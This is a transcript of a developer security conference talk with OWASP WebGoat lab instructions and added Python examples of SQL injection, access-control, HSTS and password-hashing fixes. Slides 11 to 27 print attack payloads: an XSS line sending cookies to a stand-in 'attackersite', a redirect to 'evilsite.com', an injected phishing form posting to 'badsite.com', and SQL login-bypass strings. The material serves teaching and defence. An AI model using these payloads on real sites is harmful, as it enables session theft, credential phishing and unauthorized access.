Devbeat Conference - Developer First Security

Topics include:

- Sample and Demo of Top Application Risks
  — Cross Site Scripting, SQL Injection, Access Control
- Who’s Monitoring Your Traffic?
  — Encrypting in Transit
- Secure Data Storage & Protection
  — Correct Password Storage & Data Protection
- Growing Threats Plaguing Applications

Published in: Technology, Business
Transcript of "Devbeat Conference - Developer First Security"

  1. Developer-first security: Integrating Security into Development. Michael Coates, michael@ShapeSecurity.com, michael-coates.blogspot.com, @_mwc
  2. About Me. michael@shapesecurity.com
  3. Reality
  4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”. Sources: http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking and http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
  5. Data Loss & Breaches. Sources: datalossdb.org; Verizon Data Breach Report 2013
  6. Outside Attackers. Sources: datalossdb.org; Verizon Data Breach Report 2013
  7. Security - Into The Details
     • Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control
     • Who’s Monitoring Your Traffic? — Encrypting in Transit
     • Secure Data Storage & Protection — Correct Password Storage & Data Protection
     • Growing Threats Plaguing Applications
  8. WARNING: Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  9. 3 Dangerous Vulnerabilities: Cross Site Scripting, SQL Injection, Access Control
  10. What are Web Requests? Open console & enter the following:
     • telnet google.com 80
     • GET / HTTP/1.1
     • Hit return 2 times
  11. Cross Site Scripting (XSS)
     • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code
     • Impact: Session Hijacking, Full Control of Page, Malicious Redirects
     • Basic XSS Test: "><script>alert(document.cookie)</script>
     • Cookie Theft Example: "><script>document.location='http://attackersite/'+document.cookie</script>
  12. XSS Behind The Scenes. Request: http://shinypage.com?user=Bob. JSP Code: <h1>Glad to see you <%= request.getParameter("name") %></h1>. Rendered HTML: <div>Glad to see you <b>Bob</b></div>
  13. XSS Behind The Scenes. Request: http://shinypage.com?user=friend</b>
      <br><form method="post" action="badsite.com/login">
      Login: <input type="text" name="username"><br>
      Password:<input type="password" name="password">
      <input type="submit" value="Submit" /></form>
  14. XSS - Injecting HTML: Rendered HTML (screenshot of the injected login form)
  15. Cross Site Scripting
     • Cross Site Scripting typically uses JavaScript to do bad things
     • Steal session cookies: <script>alert(document.cookie)</script>
     • Redirect to bad pages: <script>window.location = "http://evilsite.com/"</script>
     • Rewrite page on the fly
  16. Lab! - Reflected XSS
  17. Reflected XSS Lab
     • Lesson: Cross-Site Scripting -> Reflected XSS Attacks
     • Proxy Not Needed
  18. Lab! - Stored XSS
  19. Stored XSS Lab
     • Lesson: Cross-Site Scripting -> Stored XSS Attacks
     • Proxy Not Needed
  20. XSS Prevention. Solution:
     1. Output Encoding - converts command characters to benign characters for display
     2. Input Validation
     Encoded output: <h1>Glad to see you <%= encodeForHTML( request.getParameter("name") ) %></h1>
     HTML Encoding table: < becomes &lt;, > becomes &gt;, " becomes &quot;, ' becomes &#x27;, & becomes &amp;
  21. XSS Attempt Revisited. Request: http://shinypage.com?user=friend</b>
      <br><form method="post" action="badsite.com/login">
      Login: <input type="text" name="username"><br>
      Password:<input type="password" name="password">
      <input type="submit" value="Submit" /></form>
  22. Safe Handling. Rendered HTML (the markup is now displayed as text, not parsed):
      Glad to see you friend</b>
      <br><form method="post" action="badsite.com/login">
      Login: <input type="text" name="username"><br>
      Password:<input type="password" name="password">
      <input type="submit" value="Submit" /></form>
  23. XSS Resources
     • OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
     • Content Security Policy - http://bit.ly/CSP-OWASP
     • OWASP XSS Overview - http://bit.ly/OWASPXSS
  24. SQL Injection
     • Problem: User controlled data improperly used with SQL statements
     • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
     • Basic SQL Injection Tests: OR 1=1 --  and  ' OR '1'='1'--
     • Example Vulnerable Query (string concatenation): sqlQ = "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
  25. Lab! - SQL Lesson
  26. SQL Injection
     • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection
     • Proxy Needed
     • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  27. SQL Injection
     • HTTP Post: employee_id=112&password=x' OR '1'='1&action=Login
     • Vulnerable SQL: "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
     • Resulting Statement: Select user from UserTable where name='112' and pass='x' OR '1'='1'
     • Result: ... name='112' and pass='x' OR TRUE (the OR TRUE makes the WHERE clause match every row)
  28. SQL Injection
     • Parameterized Queries: no confusion with control characters. Example: the query would look for a password of ' or '1'='1
     • Input Validation: Are special characters needed for most fields? What about non-printable characters %00-%0A?
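Slides 24, 27 and 28 run end to end, as an added Python example (not the talk's or WebGoat's code): the concatenated query beside its parameterized form, against an in-memory SQLite table. The rows are constructed, the table and column names follow the slide, and the request values are the slide 27 POST body.

```python
import sqlite3

# Constructed sample rows (name, pass); employee 112 is the slide 26 target
ROWS = [("112", "correct horse"), ("105", "tom-secret")]


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE UserTable (user TEXT, name TEXT, pass TEXT)")
    con.executemany("INSERT INTO UserTable VALUES (?, ?, ?)",
                    [("emp" + n, n, p) for n, p in ROWS])
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> list:
    """The slide 24 query, built by concatenation. The quote inside the
    password closes the string literal and the rest is parsed as SQL."""
    sqlQ = ("Select user from UserTable where name='" + username +
            "' and pass='" + password + "'")
    return [row[0] for row in con.execute(sqlQ)]


def login_parameterized(con: sqlite3.Connection, username: str, password: str) -> list:
    """The slide 28 fix. Values travel separately from the statement, so the
    database compares the whole string, quotes and all, against pass."""
    sqlQ = "Select user from UserTable where name=? and pass=?"
    return [row[0] for row in con.execute(sqlQ, (username, password))]


# The slide 27 POST body, URL-decoded
EMPLOYEE_ID = "112"
PASSWORD = "x' OR '1'='1"

if __name__ == "__main__":
    con = setup_db()
    print(login_vulnerable(con, EMPLOYEE_ID, PASSWORD))     # every row: OR TRUE
    print(login_parameterized(con, EMPLOYEE_ID, PASSWORD))  # []
```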

  29. SQL Injection Resources: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  30. Access Control
     • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user
     • Impact: Unauthorized data access, access to privileged functionality
     • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
     • Access Control Failure Example: http://somebadbank.com/showacct?id=101 versus http://somebadbank.com/showacct?id=102

  31. Lab! - Access Control
  32. Access Control Violation
     • Lesson: Access Control Flaws -> LAB: Role Based Access Control -> Stage 1: Bypass Business Layer Access Control
     • Proxy Needed
     • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
  33. Access Control Violation
     • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server:
       POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
       Host: localhost

       employee_id=105&action=ViewProfile
  34. Strong Access Controls
     • Access Control Performed Server Side
     • Never Relies Upon “Security by Obscurity”
     • Be Careful with Identifiers (e.g. id=123)
     • Attacker Can Send Anything in Request
     • Presentation Layer Controls Can Not Enforce Access Control
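Slides 30 to 34 as an added Python example (not WebGoat's code): a handler that executes whatever action the POST body names, beside one that decides server side from the session's role. The users, roles and action table are constructed; the request body format is the one shown on slide 33.

```python
from urllib.parse import parse_qs

# Constructed users: Tom is a plain employee (id 105, as in the slide 33 request)
USERS = {
    "tom": {"id": "105", "role": "employee"},
    "moe": {"id": "101", "role": "manager"},
}

# Which roles may invoke each action; the client never gets a say in this
ALLOWED_ROLES = {
    "SearchStaff": {"employee", "manager"},
    "ViewProfile": {"employee", "manager"},
    "DeleteProfile": {"manager"},
}


class Forbidden(Exception):
    pass


def _parse(body: str) -> tuple:
    params = parse_qs(body, strict_parsing=True)
    return params["employee_id"][0], params["action"][0]


def handle_vulnerable(session_user: str, body: str) -> str:
    """Slide 30 failure: the server assumes the UI only sends the actions it
    rendered, so any action name in the POST body is executed."""
    target, action = _parse(body)
    return f"{action} on employee {target}"


def handle_safe(session_user: str, body: str) -> str:
    """Slide 34: authorization decided server side from the session's role
    and the target record, whatever the request claims."""
    target, action = _parse(body)
    me = USERS[session_user]
    if action not in ALLOWED_ROLES or me["role"] not in ALLOWED_ROLES[action]:
        raise Forbidden(f"{session_user} ({me['role']}) may not {action}")
    if me["role"] != "manager" and target != me["id"]:
        raise Forbidden(f"{session_user} may only act on own record {me['id']}")
    return f"{action} on employee {target}"


def is_permitted(session_user: str, body: str) -> bool:
    try:
        handle_safe(session_user, body)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    tampered = "employee_id=105&action=DeleteProfile"   # the slide 32 lab goal
    print(handle_vulnerable("tom", tampered))            # executes the delete
    print(is_permitted("tom", tampered))                 # False
```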
  35. Access Control Resources: https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
  36. Who’s Monitoring Your Traffic?
  37. Insecure Session Management
     • Secure login over HTTPS (https://site.com/login): password submitted encrypted
     • Immediate redirect to HTTP (http://site.com/profile)
     • Session ID sent cleartext <-- vulnerability point
  38. Vulnerable Redirects
     • User requests HTTP page, response redirects to HTTPS
     • 302 Response is HTTP <-- Vulnerability Point
  39. Secure Design for Communication
     • Use HTTPS Throughout Web Site!
     • HTTP Strict Transport Security (HSTS)!
       • Opt-in security control
       • Website instructs compatible browser to enable STS for site
       • HSTS Forces (for enabled site): all communication over HTTPS; no insecure HTTP requests sent from browser; no option for user to override untrusted certificates
  40. Strict Transport Security
     • Browser prevents HTTP requests to HSTS site
     • Any request to site is “upgraded” to HTTPS
     • No clear text HTTP traffic ever sent to HSTS site
     • Browser assumes HTTPS for HSTS sites
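The browser-side behaviour of slides 39 and 40, as an added Python model (not code from the talk or any browser): a store that records Strict-Transport-Security headers and upgrades later http:// URLs, so the slide 37 redirect to http://site.com/profile never goes out in cleartext. The header directives are those of RFC 6797; the class and its method names are this example's own, and the clock is injectable so expiry can be shown.

```python
import time
from urllib.parse import urlsplit, urlunsplit


class HstsStore:
    """Browser-side HSTS state: hosts that may only be contacted over HTTPS."""

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable so expiry can be exercised
        self._hosts = {}             # host -> (expiry time, includeSubDomains)

    def observe(self, host: str, scheme: str, header: str) -> None:
        """Record a Strict-Transport-Security header from a response. Per
        RFC 6797 it only counts when received over HTTPS, so nobody on a
        cleartext hop can plant or clear the policy."""
        if scheme != "https":
            return
        max_age, subs = None, False
        for directive in header.split(";"):
            name, _, value = directive.strip().partition("=")
            if name.lower() == "max-age":
                max_age = int(value.strip().strip('"'))
            elif name.lower() == "includesubdomains":
                subs = True
        if max_age is None:
            return
        if max_age == 0:             # site is opting out again
            self._hosts.pop(host, None)
            return
        self._hosts[host] = (self._clock() + max_age, subs)

    def is_known(self, host: str) -> bool:
        """Match the host itself, or an unexpired parent with includeSubDomains."""
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self._hosts.get(".".join(labels[i:]))
            if entry and entry[0] > self._clock() and (i == 0 or entry[1]):
                return True
        return False

    def upgrade(self, url: str) -> str:
        """Slide 40: an http:// request to a known host is rewritten to
        https:// before it is sent, so no cleartext request ever leaves."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known(parts.hostname or ""):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


if __name__ == "__main__":
    # The slide 37 flow: login over HTTPS, then a redirect to http://site.com/profile
    store = HstsStore()
    store.observe("site.com", "https", "max-age=31536000; includeSubDomains")
    print(store.upgrade("http://site.com/profile"))   # https://site.com/profile
```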
  41. Secure Data Storage & Protection
  42. Password Storage
     • Bad Approaches! Your own algorithm; md5; encryption; base64 encoding; rot 13; sha1
     • Good Approach! PBKDF2; Bcrypt; plus a per-user salt
  43. What Are We Protecting?
     • Correct password hashing protects against: offline attacks of password repository; brute force, rainbow attacks
     • Does not address: guessing easy passwords; password theft, disclosure; session hijacking; credential stuffing
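Slide 42's good approach in working form, as an added Python example (not the talk's code): PBKDF2-HMAC with a fresh per-user salt, stored next to the iteration count, beside the unsalted md5 it replaces. The 600,000 iteration count is an assumption (the slide names none); the storage string format and function names are this example's own.

```python
import base64
import hashlib
import hmac
import os

# Assumption (the slide names no count): 600,000 PBKDF2-HMAC-SHA256 rounds,
# the figure in current OWASP password storage guidance
ITERATIONS = 600_000


def md5_store(password: str) -> str:
    """The slide's bad approach: unsalted and fast, identical for identical
    passwords, so one precomputed table breaks every such account at once."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Slide 42 good approach: PBKDF2 with a fresh per-user salt. Salt and
    iteration count are stored alongside so they can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join(("pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(),
                     base64.b64encode(dk).decode()))


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


if __name__ == "__main__":
    # Constructed: two users who both chose the slide 50 password "password1"
    print(md5_store("password1") == md5_store("password1"))   # True: same digest
    a, b = hash_password("password1"), hash_password("password1")
    print(a == b)                                             # False: per-user salt
    print(verify_password("password1", a), verify_password("abc123", a))
```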
  44. Architecture for Sensitive Data. Diagram: https://site.com -> web server -> internal SSL -> database. Monitor Database Queries & Response Size
  45. Encrypting Sensitive Data in Database. Diagram: Encrypt User Data with a Customer/Group Encryption Key; the Key Encrypting Key lives in a Hardware Security Module; the database stores the Encrypted [Customer/Group Encryption Key]; Decrypt on read
     • Encryption within Database
     • Unique keys per data region
     • Key encrypting keys
     • Hardware Security Modules (
  46. Growing Threats Plaguing Applications
  47. Denial of Service: Denial of Service (DOS); Distributed Denial of Service (DDOS)
  48. Denial of Service
     • Network DDOS: Exhaust Network Bandwidth
     • Application Layer DDOS (e.g. site.com/generateReport): Exhaust Server CPU/Memory
  49. Application Denial of Service
     • Traditional Network DDOS: overwhelms target with volume; exhausts bandwidth / capacity of network devices; requires large number of machines. Defenses: CDN, anti-DDOS services
     • Application DDOS: invokes computationally intense application functions; exhausts CPU / memory of web servers; requires few machines. Defenses: few available, must customize
  50. Credential Stuffing. Diagram: a compromised server leaks its credentials (joe: abc123, sue: password1, bob: MyP0n3y); the stolen credentials (sue:password1, joe: abc123) are then replayed against https://site.com/login
  51. Take Aways
     • Understand top security threats and anticipate potential malicious use of application to design secure code
     • Multiple controls possible to protect sensitive data in transit and storage
     • Understand emerging threats to plan for appropriate defenses
     • Use OWASP BWA Security Lab and learn more!
  52. Thanks! michael@ShapeSecurity.com, http://michael-coates.blogspot.com, @_mwc
  53. Virtual Security Training Lab Setup
  54. Software
     • Vulnerable Server: OWASP’s Webgoat
     • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)
     • Browser
     • Virtual Machine: OWASP Broken Web App VM
  55. Test Connectivity to VM
     1. Open Browser
     2. Browse to your VM ip (listed in VM login page), e.g. http://192.168.56.101
     3. Should see OWASP BWA welcome page
     4. Error? Check ip address of VM
  56. WebGoat
     • Click First Link - OWASP WebGoat version 5.3.x
     • Username / Password is guest / guest
  57. Understanding the Proxy
     • Proxy is middle-man between browser and web server
     • Assists with traffic manipulation & inspection
     • Diagram: Attacker’s Browser -> Web Proxy -> Web Server
  58. Understanding the Proxy. Diagram: Your Computer (Primary OS: Browser, Web Proxy) -> VM (Web Server)
  59. Enabling Proxy
     1. Open ZAP
     2. Configure Firefox to use proxy
     3. Resend Request
     4. Confirm received by proxy
     5. Forward to web server (vm)
  60. Using A Proxy: ZAP - Configure to listen on 8080
  61. Set Firefox Proxy
     • Set Firefox proxy to 8080
     • Preferences -> Advanced -> Network -> Settings
     • Set HTTP Proxy
     • Important - clear the “No Proxy for” line
  62. Confirm Setup Works
     • Refresh Web Browser
     • Go to ZAP
     • See site in left-hand column
  63. Intercepting Traffic
     • Add a “breakpoint” by right clicking on the page and choosing “Break...”
     • Refresh the webpage - it will hang
     • Modify the request as needed, then press the “Continue” button
  64. “Hello World” of Proxies
     • Lesson: General -> Http Basic
     • Objective: Enter your name into text box; intercept with proxy & change entered name to different value; receive response & observe modified value is reversed
     • Diagram: Attacker’s Browser sends Joe -> Web Proxy changes it to Sue -> Web Server responds euS